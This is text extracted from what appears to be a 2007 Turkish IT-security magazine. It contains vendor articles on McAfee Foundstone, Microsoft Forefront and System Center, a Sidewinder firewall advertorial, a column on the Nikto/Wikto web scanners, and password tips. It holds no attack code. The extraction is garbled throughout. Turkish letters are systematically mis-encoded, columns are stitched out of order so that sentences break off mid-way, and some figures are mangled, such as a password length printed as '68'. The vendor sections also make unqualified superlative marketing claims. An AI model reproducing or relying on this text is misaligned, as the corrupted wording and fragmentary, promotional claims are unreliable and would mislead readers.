Yarat›lan taramalar istenirse varl›k gruplar› üzerinde etkinlefltirilebilir. Birden çok tarama ifllemi ayn› anda bafllat›labilir.
ile entegrasyonda kullan›l›r. Intrushield kullan›c›lar›
Foundstone’un bu özelli¤inden faydalan›p Foundstone’un
tespit etti¤i güvenlik aç›klar›na karfl› herhangi bir atak yap›l›p
yap›lmad›¤›n› kolayl›kla gözlemleyebilirler.
raporlar› e-posta yolu ile gönderebilir. Ayn› tarama ifllemi
birden çok çal›flt›r›ld›¤› zaman fark (Delta) raporlar› al›nabilir.
Bu özellik sayesinde sistemler üzerinde yap›lan de¤ifliklik ve
iyilefltirme çal›flmalar› sonucunda sistem riski üzerindeki
fark görülebilir. Bu raporlar ayn› zamanda bir baflka McAfee
ürünü olan Intrushield a¤ tabanl› atak engelleme sistemleri
McAfee Foundstone üzerinde birden çok organizasyon
bar›nd›rabilir. Güvenlik hizmeti veren firmalar Foundstone
kullanarak farkl› müflterilere tek bir sistem üzerinden hizmet
verebilir. Her organizasyon kendi kullan›c›s›n› yaratabilir ve
sistem üzerinde yarat›lm›fl di¤er organizasyonlardan ba¤›ms›z
olarak risk analizlerini yapabilirler.
Agu’07 eskiz-6 7/31/07 12:35 AM Page 6
Mehmet Üner
mehmetu@microsoft.com
Art›k Kontrol Sizde
Günümüzde, BT yöneticileri ve BT çal›flanlar› birçok zorlukla
karfl› karfl›ya bulunmaktad›r. Bunlar›n bafl›nda gittikçe karmafl›klaflan BT altyap›lar›n› baflar›l› bir flekilde idare etmek,
çal›flt›klar› kurumlar›n sahip oldu¤u bilgileri korumak ve
kurum çal›flanlar›na her yerden ve her cihazdan güvenli bir
flekilde eriflimi sa¤layabilmek gelmektedir. K›saca Yönetim
ve Güvenlik her kurumun BT altyap›s›n›n temelini oluflturan
parçalar haline gelmifl durumdad›r. Bu durum asl›nda birçok
ba¤›ms›z araflt›rma kuruluflu taraf›ndan da desteklenmektedir. Yak›n bir zamanda 2S’nin (System Management,
Security), birbirinden ayr›lmaz bir bütün haline gelecekleri,
bugün endüstrinin önde gelen analiz flirketleri raporlar›nda
da yer almaktad›r.
Bu stratejiyi, yani Sistem Yönetimi ile Güvenli¤i entegre
bir flekilde uyarlayan ve çözümlerini bu do¤rultuda oluflturan
flirketlerden biri de Microsoft’dur. Microsoft, bu alanlarda
sahip oldu¤u tecrübelere, yapt›¤› yat›r›mlar› da ekleyince;
Güvenlik ve Sistem Yönetimi alan›nda birçok ürün ve çözümü müflterilerine entegre bir flekilde sunmaya bafllam›flt›r.
Microsoft güvenlik ürünlerini Forefront Ailesi ile tek bir
çat› alt›na toplad›ktan sonra, yönetim ürünlerini de System
Center Ailesi alt›na toplam›flt›r. (Resim 1) Bu iki Aile ile
Microsoft, BT yöneticilerine ve çal›flanlar›na art›k “Kontrol
Sizde” mesaj›n› vermektedir. Böylece kurumlar uçtan uca
güvenlik ve uçtan uca yönetim ihtiyaçlar›n› karfl›layabilmektedir. Forefront ve System Center Ailelerinin lansmanlar›
yurtd›fl›nda, geçti¤imiz aylar içinde yap›ld›. Türkiye tan›t›m›
ise önümüzdeki Eylül ay›nda, birçok Microsoft ifl orta¤›n›n,
yurtiçi ve yurtd›fl› konuflmac›lar›n›n kat›l›m› ile ayn› zamanda
demo alanlar› ve müflteri hikayeleri ile birlikte oldukça genifl
bir içerikle yap›lacak.
çözümler ayr›ca fiziksel ve sanal ortamlar›n kapsaml› yönetimini sa¤layarak, verimli ve kontrollü gelifltirmelere olanak
Microsoft Forefront Ailesi
• Forefront Client Security
• Forefront Server for Exchange Server
• Forefront Server for SharePoint
• Antigen for Instant Messaging
• Internet Security and Acceleration Server 2006
• Intelligent Application Gateway 2007
• Kod Ad› “Stirling”
Microsoft System Center Ailesi
• System Center Operations Manager
• System Center Configuration Manager
• System Center Data Protection Manager
• System Center Virtual Machine Manager
• System Center Essentials
• System Center Capacity Planner
• System Center Service Desk
(Resim 1)
System Center Ailesini daha detayl› olarak incelersek, kendi
kendini yöneten dinamik sistemler tasarlamay› amaçlayan
Microsoft, bu aile ile gelifltirme, operasyon ve IT aras›ndaki,
iflletim sistemi, uygulamalar, birleflik servis ve ifl ak›fllar›ndan
kaynaklanan bofllu¤u; ba¤›ml›l›klar› de¤erlendirerek ve ifl
süreci performans›n› optimize ederek kapatmaktad›r. Bu
tan›maktad›r. System Center Ailesi ile kritik IT sistemleri,
uygulamalar› ve servisleri güvenilir bir flekilde tamamen
kontrol edilebilir. System Center’in temelini oluflturan iki
önemli ürün, Configuration Manager (eski ad›yla SMS) ve
Operations Manager (eski ad›yla MOM) bugün birçok kurum
taraf›ndan da kullan›lmaktad›r.
Kurumlar›n bugün en önemli ihtiyaçlar›ndan biri, IT ortamlar›n› monitör etmek ve neler olup bitti¤ini dinamik olarak
gözlemlemektir. ‹flte System Center Operations Manager
bu ihtiyaca, IT ortamlar›n› proaktif bir flekilde monitör ederek (Buna istemciler de dahil olmak üzere.) ve kritik uygulamalar için bir servis a¤ac› modeli
oluflturarak cevap
verebiliyor. Bununla beraber içine eklenmifl yönetim paketleriyle, uygulamalar› ve iflletim sistemlerini
gelifltiren yaz›l›m ekiplerinin, bütün bilgisini IT yöneticilerine
aktarmas› sayesinde, flirket kurumsal a¤›n›n oldukça önemli
bir parças› oluyor. Bu özellikler d›fl›nda sahip oldu¤u Audit
Collection Service (ACS) ile kurum içindeki bilgisayarlardan
toplad›¤› loglar› merkezi olarak raporlayabiliyor ve bir
sistem yönetimi ürününün güvenli¤e nas›l katk›da bulunabilece¤ini bizlere gösteriyor.
T›pk› Operations Manager gibi System Center
Configuration Manager, flirketlerin birçok önemli sorununa
çözüm oluyor. Bütün istemciler ve sunucular üzerinde
yap›lan manuel ifllemleri azaltarak, IT üretkenli¤ini ve
verimini art›r›yor. ‹flletim sistemleri ve uygulamalar,
Configuration Manager ile uzaktan yüklenebilir hale geliyor.
Ayr›ca kapsaml› bir varl›k yönetimi ile kurumun sahip oldu¤u
bütün varl›klar
detayl› bir flekilde
gözlemlenebiliyor.
Microsoft’un sat›n
ald›¤› Assetmetrix
teknolojisi ile bir
kurumun sahip oldu¤u yaz›l›mlar detayl› bir flekilde tür ve
üretici bak›m›ndan kategorilendirilebiliyor ve hatta lisansl›,
lisanss›z veya beta versiyon olup olmad›klar› bile raporlanabiliyor. Son olarak, istenilen konfigürasyon bilgisini oluflturmas› ve model tabanl› yönetimi sayesinde Configuration
Manager, sistemlerin çok daha sa¤l›kl› ve performansl› çal›flmas›n› sa¤layabiliyor. Configuration Manager, t›pk›
Operations Manager gibi kurumlar›n güvenli¤ine de katk›da
bulunabiliyor. ‹flletim sistemleri için kritik yamalar› da¤›tmas›
d›fl›nda, içinde bar›nd›rd›¤› MBSA (Microsoft Baseline
Security Analyzer) özelli¤i sayesinde kurum içi bütün bilgisayarlardaki aç›klar› tarayabiliyor. Böylece IT yöneticileri bütün kurumdaki aç›klar› tek bir noktadan görebiliyor.
Bu iki üründen bahsetmiflken System Center
Essentials’dan da mutlaka bahsetmek gerekir. Özellikle
orta ölçekli kurumlar için tasarlanm›fl olan bu çözüm, sunucular›n, istemcilerin, donan›m›n, yaz›l›m›n ve IT servislerinin
görüntülemesine ve yönetilmesine olanak veren tek bir
konsol sa¤layabiliyor. K›saca Configuration ve Operation
Manager teknolojilerinin birleflmesinden ortaya ç›kan tek
bir ürün ile IT altyap›s›n›n verimli ve basit bir flekilde yönetilmesine olanak sa¤l›yor.
System Center Virtual Machine Manager ise, fiziksel
sistemler d›fl›nda art›k hayat›m›z›n bir parças› haline gelen
sanal sistemler üzerinde tam bir hakimiyet kurulmas›n›
sa¤l›yor. Böylece fiziksel sistemlerin, sanal sistemlere
geçiflleri, kapasite planlamas›, kaynak atanmas› gibi oldukça
kar›fl›k ve zor olan ifller, System Center ailesinin bu yeni
üyesiyle birlikte verimli bir flekilde yap›labiliyor. Basitlik
bak›m›ndan ise, tek bir yönetim konsolu ile flirketin sahip
oldu¤u bütün sanal altyap› yönetilebiliyor ve bütün sanal
makineler ile konfigürasyon bilgileri merkezi olarak
saklanabiliyor.
System Center Data Protection Manager, kurumlar›n en
önemli ihtiyaçlar›ndan birini karfl›l›yor: “Yedekleme”.
Sundu¤u disk tabanl› yedekleme ve kurtarma çözümleri ve
basit arayüzleri ile
mevcut IT altyap›s›na entegrasyonu sayesinde IT
yöneticilerini yedekleme ifllemlerinin kar›fl›kl›¤›ndan kurtar›yor.
Aileye yeni kat›lacak üyelerden biri olan “System Center
Service Desk” ise içinde de¤ifliklik, varl›k ve problem yönetimi bulunan, bir kurumun bütün servis yönetim ihtiyaçlar›n›
karfl›layabilecek bir çözüm sunuyor. Service Desk’in en
önemli özelliklerinden biri ise mevcut IT altyap›s› ile olan
entegrasyonu ve bir çok yönetim ifllemini otomatik olarak
sa¤l›yor olmas›.
2S’nin ikinci parças›na geçersek, Güvenlik (Security)
alan›nda da Microsoft’un çözümlerinin uçtan uca ve detayl›
olduklar›n› görebiliriz. Bunlardan
belki daha da önemlisi Güvenlik Çözüm
Ailesi Forefront’un,
Agu’07 eskiz-6 7/31/07 12:35 AM Page 7
System Center Ailesi ile tamamen entegre çal›flmas› ve
sonuç olarak güvenli¤i maksimum ölçüde sa¤larken verimlili¤i ve basitli¤i de çok önemli özellikler olarak eklemesidir.
Özellikle Microsoft uygulamalar› için özel olarak tasarlanm›fl Forefront Sunucu Uygulamalar› ile Exchange,
Sharepoint ve Live Communications Server gibi uygulamalar
tamamen güvenlik alt›na al›nabiliyor. Forefront sunucu
ailesinin en önemli
özelli¤i ise endüstrinin önde gelen
antivirüs motorlar›n› içinde bar›nd›rmas› ve böylece kurumlara birden fazla motorun gücünü
sunabilmesidir.
Kurumsal A¤’›n oldukça önemli bir parças› olan Forefront
Client Security, sunucu ve istemci iflletim sistemlerine
kurularak, dosya sistemi seviyesinde zararl› yaz›l›mlara
(virüs, spyware, rootkit) karfl› etkin bir koruma sa¤layabiliyor. Forefront Client Security, Operations Manager,
WSUS, Active
Directory ve SQL
ile entegre çal›flarak bir güvenlik
ürünün asl›nda
yönetim bak›m›ndan ne kadar etkin bir flekilde kullan›labilece¤ini bizlere
göste-riyor. Forefront ve System Center Ailelerinin entegre
bir flekilde çal›flt›¤›n› belki de bize en güzel gösteren
ürünlerden biri olan Client Security, sa¤lad›¤› korumalar
d›fl›nda yapt›¤› hassasiyet analizleriyle de kurumlar› IT
denetimleri için haz›rlayabiliyor.
Kurumlar ile internet aras›ndaki d›fl ba¤lant› noktas›nda
Microsoft Forefront Ailesi iki güvenlik ürünü ile kurumlara
çözümler sunuyor.
ISA 2006 ve IAG
2007, bugün
Forefront’un d›fl
ba¤lant› ürünlerini
oluflturuyorlar. Köklerin-de bir proxy sunucusu olmas›na
ra¤men bugün geldi¤i noktada komple bir güvenlik çözümü
haline dönüflen ISA 2006, içinde bar›nd›rd›¤› Firewall, IPSEC
VPN, Sald›r› Tespit ve Önleme, Caching, Load Balancing ve
Proxy teknolojileri ile Kurumsal A¤ ve ‹nternet aras›nda
maksimum bir koruma sa¤layabiliyor. Ayr›ca gelecek sene
gelifltirilmesi planlanan ISA 2008 sürümü ile de çok daha
fazla güvenlik
özelli¤ini içinde
bar›nd›racak bir
duruma geliyor.
Günümüzde kurumlar›n duydu¤u en önemli ihtiyaçlardan
biri de kurumsal a¤a güvenli bir flekilde uzaktan eriflimdir.
Forefront Güvenlik Ürün Ailesi ile Microsoft iki temel çözümü
kurumlar›n hizmetine sunuyor. Kullan›c› bilgisayarlar›na
bir program kurulmak isteniyorsa veya iki Firewall aras›nda
bir site-to-site VPN yap›lmak isteniyorsa, ISA 2006’›n sahip
oldu¤u IPSEC VPN
teknolojisi
kullan›labiliyor.
E¤er kullan›c›
bilgisayarlar›na
program kurulmak
istenmiyor fakat
kurumsal a¤ içindeki bütün kaynaklara güvenli bir flekilde
internetten eriflilmek isteniyorsa, IAG 2007 (Intelligent
Application Gateway 2007)’in sahip oldu¤u SSL VPN
teknolojisi kullan›labiliyor. IAG 2007 ile kullan›c›
bilgisayarlar›na program kurulmad›¤› için, kullan›c›lar
internete ba¤l› herhangi bir bilgisayardan kurum a¤›na
ba¤lanabiliyor. Bu
noktada ise IAG’nin
sahip oldu¤u son
nokta kontrolü teknolojisi ile kullan›c›n›n bir kiosk’tan
m› yoksa yönetilen
bir istemci’den mi geldi¤i tespit ediliyor. Tamamen rol ve
politika tabanl› kontroller ile maksimum güvenlik sa¤lan›rken, attachment viper teknolojisi ile kullan›c› oturumunda
oluflturulan bütün bilgiler oturum sonunda temizlenebiliyor.
Böylece bir kiosk’tan ba¤lanan istemcilerde herhangi bir
bilgi b›rak›lm›yor.
Sonuç olarak kurumlar, Microsoft’un Güvenlik Ailesi
Forefront ve Yönetim Ailesi System Center ile Bilgi
Teknolojileri Altyap›lar› Üzerinde Tam Bir Kontrole Sahip
Oluyorlar. ‹ki ürün ailesi hakk›nda daha fazla bilgi almak
için, Eylül ay›ndaki etkinli¤i kaç›rmaman›z› tavsiye ederiz.
Microsoft’un Güvenlik Ailesi Forefront ve Yönetim Ailesi System Center
Agu’07 eskiz-6 7/31/07 12:35 AM Page 8
Nil ALTINUS
nil.altinus@aptec.com.tr
Sidewinder® Network
Gateway Security
IT çevresindeki h›zl› de¤iflikliklere ayak uydurabilmek için
gateway güvenli¤i birçok önemli özelli¤e sahip olmal›d›r. ‹flte
Secure Computing’in Sidewinder® Network Gateway Güvenlik
cihaz› tüm bu özelliklerin yan›nda çok daha fazlas›na sahiptir.
Günümüzde birçok iflletme ‹nternet kullan›m›n›n zorunlulu¤una
inansa da, ‹nternet kullan›m›n›n faydalar›n›n yan›nda risklerinin
de bulundu¤unun fark›ndad›r. Herhangi bir iflletme, a¤›n› ‹nternet’e
ba¤lad›¤›nda sadece çal›flanlar›na ‹nternet servislerini sunmaz,
bunun yan›nda kendi firmas›n›n bilgilerini de d›fl kullan›c›lara
açm›fl olur. Bu nedenle, firma özel bilgilerinin çal›nma, de¤ifltirilme,
yokedilme vs. gibi ataklardan korunup, a¤›n güvenli¤inin
sa¤lanmas› için “firewall” teknolojisi gelifltirilmifltir.
1990’lar›n bafl›ndan itibaren a¤lar›m›z›n vazgeçilmez parças›
halini alan firewall’lar, 1989 y›l›nda Bell Labs’dan Steve Bellovin
taraf›ndan “Onlardan gelecek herhangi bir de¤er için bizi ve
onlar› ay›ran cihaz” olarak tan›mlanm›flt›r. Sektörde rekabet
eden onlarca firewall markas› olmas›na ve bu cihaza olan ihtiyac›n
artmas›na ra¤men, son kullan›c›lar hala bu cihazlar›n temel
farkl›l›klar› ya da çal›flma prensipleri hakk›nda yeterince bilgiye
sahip de¤ildir.
Sidewinder: Sektörün En Güçlü Firewall Korumas›
Tüm ana güvenlik özelliklerini kendinde birlefltiren Secure
Computing’in Sidewinder® Network Gateway Güvenlik cihaz›,
dünyadaki en güçlü firewall’dur. Kapsaml› yüksek h›zdaki
uygulama proxyleriyle birlikte infla edilmifl, TrustedSource™
reputation-tabanl› global zeka ve imza tabanl› servislere sahip
Sidewinder, bilinen ve bilinmeyen tüm tehditlerden a¤›n›z› ve
internet uygulamalar›n›z› korur. Tüm bunlar›n ya-n›nda
çal›flanlar›n›z›n internet kullan›m›n› görüntüler ve yö-netimini
sa¤lar, paketlerdeki gizli ataklardan korur, virüsleri ve dosya
transferindeki Spyware’i bloklar, detayl› raporlama sa¤lar.
Bafll›ca özellikler:
• Gigabit h›z›nda uygulama seviyesi firewall’udur.
• Sektördeki “deep inspection” firewallar›ndan 3-4 kez daha
h›zl›d›r.
• 5 ya da daha fazla güvenlik sistemini tek bir cihazda toplar
• Reputation-based global intelligence olan ilk ve tek
firewall’dur.
• ASIC h›zland›rmas›yla yeni nesil IPS (atak önleme-intrusion
prevention) sahiptir.
• Otomatik olarak zero-hour ataklar› durdurur.
• 200.000’i aflk›n atak imzas›na sahiptir.
• Yüksek seviyeli güvenlik için eflsiz üne sahiptir.
• CERT dan›flman› olmayan tek firewall.
• Hardware çözümü Patentli SecureOS® teknolojisine
sahiptir.
• Gerçek zamanl› görüntüleme, alarm ve raporlama sa¤lar.
Firewall/VPN
Sidewinder’›n gateway güvenlik ihtiyaçlar› için dünya klasman›ndaki firewall korumas›, donan›m›n›, stateful inspection
ve deep application-layer filtreleme sa¤layan birçok filtreleme
teknolojisinin en kapsaml› özellikleriyle birlefltirir.
Firewall/VPN ve bu güvenlik özellikleri (reputation servisleri,
anti-virus, anti-spam, URL filtreleme ve SSL flifre çözücü)
Secure Computing’in patentli Type Enforcement teknolojisi
ile korunmaktad›r. Sidewinder, seçkin EAL4+ Common
Criteria sertifikasyonuna sahip tek gateway cihaz› olma
özelli¤inin yan›nda, 11 y›l› aflk›n süredir hiç acil güvenlik
yamas› yay›nlamam›flt›r.
IPSec VPN
Sidewinder, a¤a uzaktan eriflim için en yeni IPSec VPN
teknolojisi, hem gateway to gateway VPN hem de client to
gateway VPN’i kullanmaktad›r. Kullan›m kolayl›¤›, birlikte
ifllerlik ve performans önemli özelliklerinden birkaç›d›r.
t›lar› reddederek, a¤lara s›zan mail trafi¤ini ortadan kald›r›r.
Sonuç olarak, mail sunucular›n›z›n ifllem süresini düflürür, a¤
bant geniflli¤i eriflilebilirli¤ini artt›r›r, a¤ altyap› maliyetini
düflürür, tüm güvenlik durumunu gelifltirirken; istenmeyen
mailler kritik mail sunucular›n›za ulaflamadan yok edilir.
UTM - Unified Threat Management
Unified Threat Management, geliflen firewall pazar›nda
2004’ten bu yana bir trend haline gelmifltir. UTM sistemleri
minimum cihaz olmas›n›n yan›nda çoklu güvenlik sistemi, OS,
Firewall, IPS, Antivirus özelliklerine sahip olmal›d›r.
Sidewinder, di¤er UTM ve Firewall ürünlerinin sa¤lad›¤›ndan
daha iyi yönetim, kontrol ve daha fazla güvenlik sa¤lamaktad›r. Bu da onu, s›n›f›n›n en iyi UTM cihaz› yapar.
Intrusion Prevention (IPS) and Automated Response
Sidewinder, çok katmanl› atak önleme (IPS) çözümü
sa¤lamaktad›r. S›n›f›n›n en iyi IPS servislerini di¤er atak önleme
güvenlik metodlar›yla birlefltirir. Endüstri lideri, full içerik
denetimini multi-gigabit throughputla yapan yüksek h›z
uygulama proxyleri, kendi antivirüs servislerini kullanarak
worm, virüs, trojan ve spyware imza taramas›, kendi antispam servislerini kullanarak spam imza taramas›,
TrustedSource servisini kullanan mail-discard servisleri,
Smartfilter servisini kullanan URL bloklama özelliklerini içerir.
Sidewinder, a¤lar için reputation-based güvenli¤ini kullanan
ilk ve tek Firewall’dur. Ayr›ca Secure Computing’in endüstri
lideri reputation servisi, TrustedSourse ile birlikte çal›flmaktad›r. Bu özellik Sidewinder’a proaktif güvenlik kararlar
almas›n› sa¤lar.
A¤ güvenlik ürünleri, zararl› içerikleri ve hackerlar› flirket
sistemlerinden uzak tutabilmek için sürekli gelifltirilmelidir.
Internet ve e-mail kullan›m› flirketlerde çok yayg›nd›r ve
d›flar›dan gelen malware, içeriden gelen veri s›z›nt›s› ya da
politika ihlallerine karfl› özel, uygulama-spesifik güvenlik
yaklafl›mlar› gerektirir. Bunlar uygulama seviye korumas›n›
temsil eder ve güvenlikle ilgili kararlar almak için amaca
yönelik tasarlanm›fl cihazlar›n üstüne entegre edilmelidir. Çift
yönlü güvenli¤e sahip ve TrustedSource’u kullanan platformlar›
kullanarak yeni nesil uygulama seviyesi güvenlik özelliklerini
kendi üzerinde bar›nd›ran ve tüm ürün ailesi uygulama spesifik
olan Secure Computing’in Gateway Güvenlik çözümleri, dünya
çap›nda bir numaraya yükselmifltir.
Sidewinder müflterileri bu hizmetten nas›l faydalan›rlar? Bu
özellik, büyük hacimdeki istenmeyen ve zararl› olan maillerin
a¤›n›za ulaflamadan otomatik olarak yok edilmesini sa¤lar.
Zombi cihazlardan ya da spam göndericilerden gelen ba¤lan-
Kapsaml› gateway güvenli¤ine olan ihtiyaç ortadad›r. Tehditler
geliflip ço¤almaya devam ettikçe, Secure Computing;
organizasyonlara güvenli internet ba¤lant›s› sa¤layan endüstri
lideri çözümler sunmaya devam edecektir.
Global-Intelligence ile TrustedSource
Reputation-Based Güvenlik
Sidewinder Güvenlik Ürün Ailesi
Sidewinder® Network Gateway Security
Sidewinder® Network Gateway Security
Agu’07 eskiz-6 7/31/07 12:35 AM Page 9
Erkan fiEN – Nebula Biliflim
erkan.sen@nebulabilisim.com.tr
Underground
Yeni bir say› ve yeni bir araç ile yeniden merhabalar. Asl›nda
bu say›m›zda Nikto’dan bahsetmek istiyordum. Çünkü birçok
uzman için oldu¤u gibi ben de ürünlerin Unix/Linux
sürümlerini kullanmay› tercih ediyorum. Ancak günümüzde
birçok sistemde Windows kullan›ld›¤›n› düflünerek, Wikto’dan
bahsetmeyi daha uygun gördüm. Asl›nda Nikto ve Wikto
ayn› ifli yapan, arkalar›nda hemen hemen ayn› kodlar çal›flan
iki farkl› yaz›l›m.
Wikto kurulduktan sonra kullan›ma bafllaman›z için yapman›z
gereken tek fley “System Config” bölümü alt›nda “Database
Locations” sekmesinden güncelleme ifllemlerini yapman›z
olacakt›r.
kullan›r. Bu imza bilgi bankas› Wikto taraf›ndan otomatik
olarak indirilebilir ve kullan›ma al›nabilir.
herfley için kullan›c› uygulama bilgileri, ba¤lant› zaman› v.b.
bilgileri web sunucusuna sa¤lar.
Wikto birçok Windows uygulamas›nda oldu¤u gibi h›zl›ca
kullan›ma geçebilmeniz için size bir sihirbaz ekran› da sa¤lar.
Aç›kcas› bu sihirbaz›n kullan›l›p kullan›lmamas› tamamen
size ba¤l› çünkü sihirbaz çok da fazla detayl› ayar yapman›za
izin vermiyor.
E¤er IDS/IPS cihazlar›n›z› test etmek ve geride ayak izleri
b›rakmadan ifllem yap›p yapamayaca¤›n›z› görmek istiyorsan›z yine komut sat›r›na dönmeli ve Nikto kullanmal›s›n›z.
Wikto varsay›lan web sayfalar›n›, web suncusunun ve bu
sunucu üzerinde bulunan CGI sayfalar›n›n güvenli¤ini test
etmek üzere ayarlanm›fl bir yaz›l›m oldu¤u için, ActiveX ve
ISAPI gibi kaynaklar›n aç›klar› ile çok fazla ilgilenmez.
Uyar›lar
Son olarak yine belirtmek
isterim ki burada bahsetti¤imiz araçlar›n tamam›
kendi sistemlerinizi test
etmeniz ve olas› ataklara
karfl› sisteminizi koruman›z için kullan›lmal›d›r.
Burada sözü edilen
araçlar›n yanl›fl kullan›mlar› sisteminize ve a¤
ortam›n›za çeflitli zararlar verebilir. Bu yüzden
bu araçlar› mümkün
oldu¤unca test ortamlar›n›zda denemeye dikkat
edin.
Nikto/Wikto nedir?
Nikto içinde 3300 potansiyel tehlikeli
olabilecek CGI kodu, 625’den fazla
sunucu sürümü ve 230 adet bu
sunuculara ait problem testlerini
bulunduran aç›k kaynak kodlu (GPL)
bir web sunucusu tarama yaz›l›m›d›r.
Nikto’nun tarama bilgi bankas› ve kod
k›s›mlar› s›kl›kla güncellenmektedir.
Nikto ayn› zamanda LibWhisker gibi kullan›fll› baz› eklentilerle,
IDS/IPS cihazlar› içinde denemek isteyebilece¤iniz bir test
arac›na dönüflebilir. Ayr›ca Nikto web yöneticilerine de
sa¤lad›¤› raporlar yard›m› ile faydal› olabilir.
Bu kadar Nikto’dan bahsettikten sonra art›k esas konumuz
olan Wikto’ya dönebiliriz. Yukar›da da belirtti¤im gibi Nikto
ve Wikto asl›nda ayn› ifle odaklanm›fl iki farkl› yaz›l›m. Afla¤›da
da görebilece¤iniz gibi Nikto komut sat›r›ndan yönetilen bir
araç.
Wikto ile yapt›¤›n›z tarama sonucunda, yaz›l›m›n imza bilgi
bankas›nda bulunan ve hedef sunucu üzerinde test etti¤i
tüm bilgilerin sonuçlar›n› ayr› ayr› görebilirsiniz. E¤er burada
varolan bir aç›k veya CGI üzerinde yanl›fl bir kod v.b. varsa
rahatl›kla tesbit edebilirsiniz. Bunun d›fl›nda yukar›da da
bahsetti¤im gibi bu tarama sonuçlar› web yöneticileri için
de çok faydal› bilgiler içeriyor olabilir.
Wikto tarad›¤› her sunucuda ayak izleri b›rak›r
Wikto tarad›¤› sunucular üzerinde iz b›rak›r. Yani test etti¤i
Underground
E¤er bu ve bunun gibi test
araçlar›n› uygulama ortam›nda deneyecekseniz,
mutlaka ilgili birimleri
bundan haberdar edin ve
elinizde sistemlerin
yedeklerinin oldu¤una
emin olun.
Kullan›c› dostu grafik arabirim
Wikto’yu seçmemin sebeplerinden biri de Windows üstünde
kullan›c› dostu ve çok fazla sorun ç›kartmayan bir arayüzü
olmas›. Afla¤›da Wikto’nun standart arayüzünü görebilirsiniz.
Wikto imza bilgi bankas› olarak Nikto ile ayn› kaynaklar›
H›zl› ve kolay kurulum
Wikto’yu kullanmak için di¤er birçok yaz›l›m›n aksine çok
fazla birfley yapman›za gerek yok. Sadece yaz›l›m› indirerek
kurulum ifllemini yapman›z yeterli. (Kurulum aflamalar› çok
basit oldu¤u için burada detaylara girmeye gerek
görmüyorum.)
Farkl› özellikler
Wikto Spider, Googler, GoogleHacks gibi bir tak›m özellikler
de sunar. Bu özelliklerin baz›lar› bilgi toplamak GoogleHacks
gibi baz›lar› ise çok bilinen atak yöntemlerini kullan›m›n›za
sunar.
Afla¤›da ilgili yaz›l›mlar›n
ve kaynaklar›n web adreslerini bulabilirsiniz. Görüfllerinizi
benimle paylaflmak ve tüm sorular›n›z için yukar›daki e-posta
adresinden bana ulaflabilirsiniz. Bir sonraki say›da buluflmak
dile¤iyle...
Kaynakça
http://www.cirt.net
http://www.sensepost.com/research/wikto/
Underground
Agu’07 eskiz-6 7/31/07 12:35 AM Page 10
Luc Erol ALPTUNA – Trend Micro
luc_alptuna@trendmicro.com
Fazla Güvenlik Göz mü Ç›kar›r?
Güvenlik ‹çin Kullan›c›lara 10 Tavsiye
Ya bu deveyi güdece¤iz, ya bu diyardan gidece¤iz. “Ben deveyi
güdece¤im” diyenlerdenseniz, güvenli ‹nternet için neler
yapmam›z gerekti¤ini tekrar hat›rlatal›m.
fiu hayat mücadelesinde karfl›m›za ç›kan sorunlarla bo¤uflmam›z
yetmezmifl gibi bir de bilgisayarlarla ilgili sorunlarla u¤raflmam›z
kendi içinde bir çeliflki gibi görülebilir. Asl›nda gerçekten de bir
çeliflkidir. Güya hayat›m›z› kolaylaflt›rmak için ald›¤›m›z bilgisayarlar, zaman içinde, bizi hayata küstüren, bunal›ma düflüren,
içkiye, sigaraya hatta psikiyatr ziyaretlerine bafllatan birer
“huzur bozucu” kimli¤ine kolayca bürünebilirler.
Virüs, solucan, çöp mesaj yani spam, bilgisayar korsan›, flifre
h›rs›zl›¤› derken, insan› do¤du¤una piflman eden bilgisayarlar›
güvenli bir flekilde kullanmak için oturup adeta ders çal›flmam›z
gerekiyor. Peki neden bu kadar s›k›nt›ya girmeden kullanabilece¤imiz bir bilgisayar yapm›yorlar, bir ‹nternet yaratm›yorlar?
Bu kadar s›k›nt› çekmek kaderimiz mi?
1977 y›l›nda Cem Karaca, “Yoksulluk Kader Olamaz” diyordu.
Aradan 30 sene geçti ve flimdi bizlerin “Güvensiz Bilgisayar
Kader Olamaz” diye flark›lar düzüp, ellerimizde pankart ve
dövizlerle meydanlara inmemize az kald›. “Ya sab›r” çekiyoruz.
fiifreler, Ah O fiifreler!
Düflünün, hangi normal insan, bu kadar çok ve karmafl›k flifreyi
akl›nda tutabilir? En az 8 haneli, büyük ve küçük harflerden ve
rakamlardan, sözlüklerde yer almayan ifadelerden oluflacak
diziler… Üstelik her bir Web sitesi, bankac›l›k, e-Ticaret vs.
flifresinin de yüksek güvenlik standartlar›n› tutturmak ad›na
birbirinden farkl› olmas› gerekiyor. Elbette mümkün de¤il. O
nedenle, insanlar ya flifrelerini bir yerlere not ediyor ve kullanaca¤› zaman aç›p bak›yor ya da her flifreyi birbiri ile ayn› olan
ifadelerden seçiyor.
güvenli¤i gibi bir kayg› tafl›m›yordu. ‹nternet’in de babas› olan
bu proje ve onun benimsedi¤i protokol, yani ba¤lant› kurma
sistemi bugün de kullan›l›yor ve çok ciddi güvenlik zaaflar›n›
bünyesinde bar›nd›r›yor.
2007 y›l›nday›z ve hâlâ 1969’un o zay›f teknolojisini kullan›yoruz.
O nedenle, hâlâ bilgisayar korsanlar›n›n önünde flifrenizi k›rman›n
çok çeflitli yöntemleri var. Hatta ben size flunu ç›tlatay›m: TCP/IP
protokolü ile gönderilen flifreler, herhangi bir gizlili¤e tabi
olmadan karfl› tarafa ulafl›yor. fiifreleri gizlemek için ek
protokoller ve yöntemler kullan›lmasayd›, flifreleriniz kabak gibi
meydanda kal›rd›.
1. fiifre ve parolalar›n›z› kolay tahmin edilemeyecek, sözlüklerde
bulunmayan sözcüklerden seçin; mümkünse harf, rakam ve
büyük harf-küçük harf kombinasyonlar›n› kullanarak en az 68 haneli flifreler oluflturun.
Çünkü hiç kimse, ‹nternet’in ticari bir amaçla kullan›labilece¤ini,
bütün dünyaya yay›labilece¤ini düflünmemiflti. Güvenlik kimsenin
umurunda de¤ildi. So¤uk Savafl y›llar›nda askerî amaçlarla,
tehdidin azalmas›na paralel olarak da akademik kurumlar
aras›nda kullan›lmas› öngörülen bir sistemdi sadece.
2. fiifre ve parolalar› herhangi bir yere kesinlikle not etmeyin.
3. Baflkalar›na flifrenizi söylemeyin.
‹sviçre’deki CERN adl› nükleer fizik ve uygulamal› bilimler
araflt›rma kurumunda görevli Tim Berners Lee adl› temiz yüzlü
bir bilim adam› World Wide Web’i yani www’yi icat etmeseydi,
bu durum de¤iflmeyecekti. Ama Lee bu icad› yap›p üstüne üstlük
bir de insanl›¤a ba¤›fllay›nca bu hallere düfltük. (Biz bu hallere
düfltük, Lee’ye ise flövalye unvan› verildi.)
